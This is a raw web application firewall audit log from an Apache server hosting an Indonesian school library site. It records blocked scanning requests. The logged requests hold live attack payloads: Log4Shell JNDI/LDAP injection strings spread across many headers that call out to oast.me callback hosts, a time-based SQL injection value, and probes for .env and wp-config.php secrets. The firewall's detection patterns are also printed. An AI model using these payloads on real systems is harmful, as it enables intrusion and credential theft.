"pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748995131552988 2131 (- - -) Stopwatch2: 1748995131552988 2131; combined=674, p1=385, p2=262, p3=0, p4=0, p5=26, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d59b9f46-Z-- --d7586f79-A-- [04/Jun/2025:07:05:53 +0700] aD-N4V_DvM40jZomokt_ZgAAABg 103.236.140.4 46504 103.236.140.4 8181 --d7586f79-B-- GET /admin/setup.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172787361 --d7586f79-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d7586f79-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748995553281039 1784 (- - -) Stopwatch2: 1748995553281039 1784; combined=661, p1=344, p2=291, p3=0, p4=0, p5=26, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7586f79-Z-- --e7d3a61f-A-- [04/Jun/2025:07:07:41 +0700] aD-OTZLmnxTwEPX7IubPYgAAAJI 103.236.140.4 46578 103.236.140.4 8181 --e7d3a61f-B-- GET /admin/wp-config.php_old2017 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 173092542 --e7d3a61f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e7d3a61f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748995661040313 720 (- - -) Stopwatch2: 1748995661040313 720; combined=261, p1=234, p2=0, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7d3a61f-Z-- --52d2d22f-A-- [04/Jun/2025:07:28:15 +0700] aD-TH9hPZJx8OfNaLCoyMgAAAMA 103.236.140.4 47578 103.236.140.4 8181 --52d2d22f-B-- GET /?x=${jndi:ldap://${:-779}${:-651}.${hostName}.uri.d0us2vpgpeonc6qdbef0cce4nhsgm9zqd.oast.me/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172788047 --52d2d22f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52d2d22f-E-- --52d2d22f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748996895692104 3825 (- - -) Stopwatch2: 1748996895692104 3825; combined=2823, p1=325, p2=2460, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52d2d22f-Z-- --a9677627-A-- [04/Jun/2025:07:28:19 +0700] aD-TI9hPZJx8OfNaLCoyNQAAAMQ 103.236.140.4 47578 103.236.140.4 8181 --a9677627-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-779}${:-651}.${hostName}.referer.d0us2vpgpeonc6qdbef0793c7w15uaadc.oast.me} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: ${jndi:ldap://${:-779}${:-651}.${hostName}.useragent.d0us2vpgpeonc6qdbef03qjb3d7fyuc8q.oast.me} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-779}${:-651}.${hostName}.accept.d0us2vpgpeonc6qdbef0hahymar4qjipf.oast.me} Accept-Language: ${jndi:ldap://${:-779}${:-651}.${hostName}.acceptlanguage.d0us2vpgpeonc6qdbef069s74m97eihd1.oast.me} Access-Control-Request-Headers: ${jndi:ldap://${:-779}${:-651}.${hostName}.accesscontrolrequestheaders.d0us2vpgpeonc6qdbef0uqzoefeey7aou.oast.me} Access-Control-Request-Method: ${jndi:ldap://${:-779}${:-651}.${hostName}.accesscontrolrequestmethod.d0us2vpgpeonc6qdbef0p6z5hbeq4h3tx.oast.me} Authentication: Bearer ${jndi:ldap://${:-779}${:-651}.${hostName}.authenticationbearer.d0us2vpgpeonc6qdbef0mruziyefzzam9.oast.me} Location: ${jndi:ldap://${:-779}${:-651}.${hostName}.location.d0us2vpgpeonc6qdbef0tm7hhcxgkqzam.oast.me} Origin: ${jndi:ldap://${:-779}${:-651}.${hostName}.origin.d0us2vpgpeonc6qdbef0eacrbgjdq8hrf.oast.me} Upgrade-Insecure-Requests: ${jndi:ldap://${:-779}${:-651}.${hostName}.upgradeinsecurerequests.d0us2vpgpeonc6qdbef0h6nsinpkwh1it.oast.me} X-Api-Version: ${jndi:ldap://${:-779}${:-651}.${hostName}.xapiversion.d0us2vpgpeonc6qdbef0n6ok5cn1bzcko.oast.me} X-CSRF-Token: ${jndi:ldap://${:-779}${:-651}.${hostName}.xcsrftoken.d0us2vpgpeonc6qdbef08wf59yr4gho7x.oast.me} X-Druid-Comment: 
${jndi:ldap://${:-779}${:-651}.${hostName}.xdruidcomment.d0us2vpgpeonc6qdbef0eh6jjd65mxy4d.oast.me} X-Origin: ${jndi:ldap://${:-779}${:-651}.${hostName}.xorigin.d0us2vpgpeonc6qdbef0pzpqgk4wi5nni.oast.me} Cookie: ${jndi:ldap://${:-779}${:-651}.${hostName}.cookiename.d0us2vpgpeonc6qdbef0a9jyd41sxjq3e.oast.me}=${jndi:ldap://${:-779}${:-651}.${hostName}.cookievalue.d0us2vpgpeonc6qdbef08mhbf3g9ntnox.oast.me} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173093114 --a9677627-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a9677627-E-- --a9677627-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748996899685912 5469 (- - -) Stopwatch2: 1748996899685912 5469; combined=3745, p1=469, p2=3247, p3=0, p4=0, p5=29, sr=101, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9677627-Z-- --2bf2e34d-A-- [04/Jun/2025:08:02:23 +0700] aD-bHzNXNn6zAsHj7JAYBwAAAFE 103.236.140.4 48588 103.236.140.4 8181 --2bf2e34d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.53.160.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.53.160.111 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --2bf2e34d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bf2e34d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748998943291818 857 (- - -) Stopwatch2: 1748998943291818 857; combined=320, p1=283, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bf2e34d-Z-- --1fdc606e-A-- [04/Jun/2025:08:18:52 +0700] aD-e_F_DvM40jZomokuBbAAAABA 103.236.140.4 48658 103.236.140.4 8181 --1fdc606e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 Accept-Charset: utf-8 --1fdc606e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fdc606e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748999932380545 801 (- - -) Stopwatch2: 1748999932380545 801; combined=379, p1=339, p2=0, p3=0, p4=0, p5=40, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fdc606e-Z-- --bb8f7660-A-- [04/Jun/2025:08:29:05 +0700] aD-hYV_DvM40jZomokuBbwAAABg 103.236.140.4 48678 103.236.140.4 8181 --bb8f7660-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.57 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.57 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --bb8f7660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb8f7660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749000545840158 886 (- - -) Stopwatch2: 1749000545840158 886; combined=392, p1=346, p2=0, p3=0, p4=0, p5=46, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb8f7660-Z-- --0292da7f-A-- [04/Jun/2025:08:29:10 +0700] aD-hZl_DvM40jZomokuBcAAAAAI 103.236.140.4 48680 103.236.140.4 8181 --0292da7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.57 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.57 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0292da7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0292da7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749000550437068 797 (- - -) Stopwatch2: 1749000550437068 797; combined=346, p1=305, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0292da7f-Z-- --835ed955-A-- [04/Jun/2025:09:03:45 +0700] aD-pgZLmnxTwEPX7IubP4wAAAIY 103.236.140.4 49076 103.236.140.4 8181 --835ed955-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --835ed955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --835ed955-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749002625712334 860 (- - -) Stopwatch2: 1749002625712334 860; combined=363, p1=328, p2=0, p3=0, p4=0, p5=35, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --835ed955-Z-- --254d4943-A-- [04/Jun/2025:09:56:47 +0700] aD-17zNXNn6zAsHj7JAYTAAAAFI 103.236.140.4 49422 103.236.140.4 8181 --254d4943-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.159 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --254d4943-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --254d4943-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749005807761247 827 (- - -) Stopwatch2: 1749005807761247 827; combined=330, p1=288, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --254d4943-Z-- --1fd9c332-A-- [04/Jun/2025:09:56:50 +0700] aD-18l_DvM40jZomokuB4gAAABY 103.236.140.4 49424 103.236.140.4 8181 --1fd9c332-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.159 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1fd9c332-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fd9c332-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749005810757989 800 (- - -) Stopwatch2: 1749005810757989 800; combined=334, p1=300, p2=0, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fd9c332-Z-- --6783c629-A-- [04/Jun/2025:10:45:04 +0700] aD_BQDNXNn6zAsHj7JAkFAAAAEE 103.236.140.4 46078 103.236.140.4 8181 --6783c629-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0us2vpgpeonc6qdbef0gzezfz855zq3f.oast.me} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0us2vpgpeonc6qdbef06efde65erawen.oast.me} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0us2vpgpeonc6qdbef0zh1nusznpxbk8.oast.me} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0us2vpgpeonc6qdbef0rchpqey85p7jz.oast.me} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0us2vpgpeonc6qdbef0odxrdbj3oneqn.oast.me} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0us2vpgpeonc6qdbef0q1995grymmmf7.oast.me} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0us2vpgpeonc6qdbef09i7wucnxwhic5.oast.me} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0us2vpgpeonc6qdbef0q56w6jhmutt64.oast.me} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0us2vpgpeonc6qdbef0fdhfjeewmfhbi.oast.me} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0us2vpgpeonc6qdbef0fejbmonq7ruf7.oast.me} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0us2vpgpeonc6qdbef0eumdecitp5nn4.oast.me} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0us2vpgpeonc6qdbef0q77yczb3f84ug.oast.me} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0us2vpgpeonc6qdbef0focxzm4pixcjd.oast.me} X-Origin: 
${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0us2vpgpeonc6qdbef01hu8sfe78f3xp.oast.me} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0us2vpgpeonc6qdbef0dtnpbsda7y4wk.oast.me}=${jndi:ldap://${hostName}.cookievalue.d0us2vpgpeonc6qdbef0gmnedn5io6et4.oast.me} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171603218 --6783c629-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6783c629-E-- --6783c629-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749008704976993 6684 (- - -) Stopwatch2: 1749008704976993 6684; combined=5278, p1=410, p2=4833, p3=0, p4=0, p5=35, sr=87, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6783c629-Z-- --9cd69636-A-- [04/Jun/2025:10:45:04 +0700] aD_BQJLmnxTwEPX7Iubb6wAAAIs 103.236.140.4 46092 103.236.140.4 8181 --9cd69636-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173179336 --9cd69636-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9cd69636-E-- --9cd69636-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749008704983383 3274 (- - -) Stopwatch2: 1749008704983383 3274; combined=1759, p1=461, p2=1267, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cd69636-Z-- --552da648-A-- [04/Jun/2025:11:22:29 +0700] aD_KBV_DvM40jZomokufNQAAABE 103.236.140.4 34060 103.236.140.4 8181 --552da648-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 Accept-Charset: utf-8 --552da648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --552da648-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749010949759676 913 (- - -) Stopwatch2: 1749010949759676 913; combined=396, p1=357, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --552da648-Z-- --43362274-A-- [04/Jun/2025:11:22:54 +0700] aD_KHthPZJx8OfNaLCpVeQAAANI 103.236.140.4 34962 103.236.140.4 8181 --43362274-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Win64; x64; Trident/5.0; .NET CLR 3.7.50745; Media Center PC 6.0; Zune 4.7; .NET4.0C; en-MT) Accept-Charset: utf-8 --43362274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43362274-H-- Message: Access denied with code 403 (phase 1). Matched 